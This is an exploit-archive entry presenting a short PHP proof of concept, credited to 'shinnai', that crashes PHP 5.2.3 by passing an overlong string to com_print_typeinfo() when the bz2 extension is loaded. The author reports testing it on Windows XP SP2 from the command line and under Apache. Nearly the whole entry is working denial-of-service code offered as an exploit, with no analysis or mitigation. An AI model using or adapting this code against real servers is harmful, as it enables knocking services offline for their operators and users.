id: 6421
date: 07/11/2007
title: PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit
author: shinnai
cves: 

============================================================
PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit
============================================================





<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp sp2, worked both from the cli and on apache

//Bug discovered with "Footzo" (thanks to rgod).


if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}

$buff = str_repeat("a",1000);

com_print_typeinfo($buff);

?>



#  0day.today [2023-03-22]  #